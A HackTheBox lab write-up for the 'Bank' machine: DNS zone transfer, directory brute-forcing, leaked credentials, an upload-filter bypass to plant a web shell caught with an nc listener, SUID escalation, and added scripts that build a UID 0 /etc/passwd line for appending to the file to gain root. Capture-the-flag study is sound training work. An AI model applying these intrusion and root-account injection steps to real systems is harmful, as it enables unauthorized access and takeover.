Hacking a bank on HackTheBox. (1 Viewer)
HackTheBox is a platform where information security professionals test their skills on realistic targets. This write-up covers the Bank machine (10.10.10.29), a scenario built around breaking into a bank's web application.

(Text only; the screenshots from the original write-up are not included.)

Nmap result:

nmap -sV -sT -O -A -p- 10.10.10.29

(-p- covers all 65535 TCP ports; -O and -A need root, and -A already implies -sV and -O.)

The scan shows ports 53 (DNS) and 80 (HTTP) open. DNS answering on TCP is worth a closer look, since TCP is the transport zone transfers use.

Digging into DNS: we request a zone transfer (AXFR) for the bank.htb zone from the target's own name server:

dig axfr @10.10.10.29 bank.htb

The transfer succeeds and lists the zone's hostnames. We add them to /etc/hosts, pointing at 10.10.10.29, so that bank.htb resolves to the target, and check the result:

cat /etc/hosts
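An added example, not from the original write-up, that automates the step above: it parses dig's AXFR output into /etc/hosts entries and checks for duplicates before anything is appended. The zone data embedded in it is constructed for the demo (generic SOA contact, a www CNAME), not the real transfer from 10.10.10.29, and the function names are my own.

```shell
# Added example (not from the original write-up): turn dig AXFR output into
# /etc/hosts entries. The zone below is CONSTRUCTED for the demo; it is not
# the real transfer from 10.10.10.29.
SAMPLE_AXFR='; <<>> DiG 9.18.0 <<>> axfr @10.10.10.29 bank.htb
;; global options: +cmd
bank.htb.        604800  IN  SOA    bank.htb. hostmaster.bank.htb. 5 604800 86400 2419200 604800
bank.htb.        604800  IN  NS     ns.bank.htb.
bank.htb.        604800  IN  A      10.10.10.29
ns.bank.htb.     604800  IN  A      10.10.10.29
www.bank.htb.    604800  IN  CNAME  bank.htb.
bank.htb.        604800  IN  SOA    bank.htb. hostmaster.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 35 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)'

# Read dig AXFR output on stdin and print one "IP name" line per A record,
# plus any CNAME whose target has an A record in the same zone.
# Comment lines (";" / ";;") and short lines are skipped; trailing dots go.
axfr_to_hosts() {
    awk '
        $1 ~ /^;/ || NF < 5 { next }
        $4 == "A"     { sub(/\.$/, "", $1); a[$1] = $5 }
        $4 == "CNAME" { sub(/\.$/, "", $1); sub(/\.$/, "", $5); c[$1] = $5 }
        END {
            for (n in a) print a[n], n
            for (n in c) if (c[n] in a) print a[c[n]], n
        }' | sort -u
}

# Collapse sorted "IP name" lines into one hosts-file line per IP.
hosts_lines() {
    awk '{ names[$1] = names[$1] " " $2 }
         END { for (ip in names) print ip names[ip] }' | sort
}

# hosts_has FILE NAME: succeed if NAME is already a hostname in FILE
# (commented-out lines do not count), so we never append a duplicate.
hosts_has() {
    _name=$(printf '%s' "$2" | sed 's/\./\\./g')
    grep -qiE "^[^#]*[[:space:]]$_name([[:space:]]|\$)" "$1" 2>/dev/null
}

# Demo on the constructed zone: prints "10.10.10.29 bank.htb ns.bank.htb www.bank.htb"
printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts | hosts_lines
```

Against the real box the pipeline is dig axfr @10.10.10.29 bank.htb | axfr_to_hosts | hosts_lines | sudo tee -a /etc/hosts, after first confirming with hosts_has /etc/hosts bank.htb that the entry is not already there.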

Checking the web page by IP address:

Using the domain name instead, we reach the login page (the application is served as a virtual host, so the Host header decides which site we get):

We try random credentials to see how the site responds to a failed login.

We run GoBuster to find the server's directories:

gobuster dir -u ... -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e

(-e prints full URLs. On gobuster 3.x, -s clashes with the default 404 blacklist, so add -b '' to the command.)

We open the directory it found in the browser:

We mirror the whole directory with wget -r, sort the downloaded files by size, and one file stands out:

Opening that file gives us login credentials:

We enter these credentials on the login page:

We check the support section and find a file upload form:

Only files with image extensions are accepted:

Intercepting the upload requests with Burp and inspecting what the server returns, we find this:

We copy our shell to a filename with the .htb extension:

With our handler listening, we open the uploaded shell in the browser and get command execution:

nc -lvp 443

(Add -n to skip reverse DNS lookups on incoming connections: nc -lvnp 443.)

We grab user.txt:

We search for SUID binaries (mode bit 4000: the file runs with its owner's privileges, root for the interesting ones):

find / -perm -4000 2>/dev/null

One result, /var/htb/bin/emergency, is not a stock system binary. We execute it and get root:

We check the permissions on /etc/passwd:

ls -al /etc/passwd

The file turns out to be writable, so we also have the ability to create other accounts by appending lines to it.
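The two checks at the end (hunting for SUID binaries that do not belong on a stock system, and checking whether /etc/passwd is writable and, if so, adding an account) as an added example, not from the original write-up. The find output it works on is constructed for the demo, the SUID baseline is my own list of what a typical Debian/Ubuntu install ships, and the function names are assumptions.

```shell
# Added example (not from the original write-up): post-shell triage helpers.
# SAMPLE_SUID is CONSTRUCTED for the demo; on the target, pipe the real
# "find / -perm -4000 -type f 2>/dev/null" output into unusual_suid.
SAMPLE_SUID='/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chsh
/var/htb/bin/emergency'

# SUID binaries a stock Debian/Ubuntu install usually ships (assumed
# baseline). Anything on the box that is not in this list deserves a look.
SUID_BASELINE='/bin/su /bin/mount /bin/umount /bin/ping /bin/fusermount
/usr/bin/passwd /usr/bin/sudo /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd
/usr/bin/newgrp /usr/bin/pkexec /usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Print the SUID paths read from stdin that are not in the baseline.
unusual_suid() {
    _baseline=" $(printf '%s' "$SUID_BASELINE" | tr '\n' ' ') "
    while IFS= read -r _path; do
        case "$_baseline" in
            *" $_path "*) ;;                  # known system binary, skip
            *) printf '%s\n' "$_path" ;;
        esac
    done
}

# Print each given file the current user can write to. On the Bank box
# /etc/passwd is the one that matters.
writable_files() {
    for _f in "$@"; do
        [ -w "$_f" ] && printf '%s\n' "$_f"
    done
    return 0
}

# root_passwd_line USER HASH: build a passwd line for a new UID 0 account.
# HASH is a crypt(3) hash, e.g. from: openssl passwd -6 'Secret123'.
# Fields containing ':' would corrupt the file, so they are rejected.
root_passwd_line() {
    case "$1$2" in
        *:*) printf 'error: fields must not contain ":"\n' >&2; return 1 ;;
    esac
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$1" "$2" "$1"
}

# Demo: prints "/var/htb/bin/emergency", then whichever of the three
# files is writable here, then a sample passwd line if openssl is present.
printf '%s\n' "$SAMPLE_SUID" | unusual_suid
writable_files /etc/passwd /etc/shadow /etc/sudoers
if command -v openssl >/dev/null 2>&1; then
    root_passwd_line pwn "$(openssl passwd -6 'Secret123')"
fi
```

On the target, if /etc/passwd shows up in writable_files, then root_passwd_line pwn "$(openssl passwd -6 'Secret123')" >> /etc/passwd followed by su pwn gives a root shell without going through the SUID binary at all.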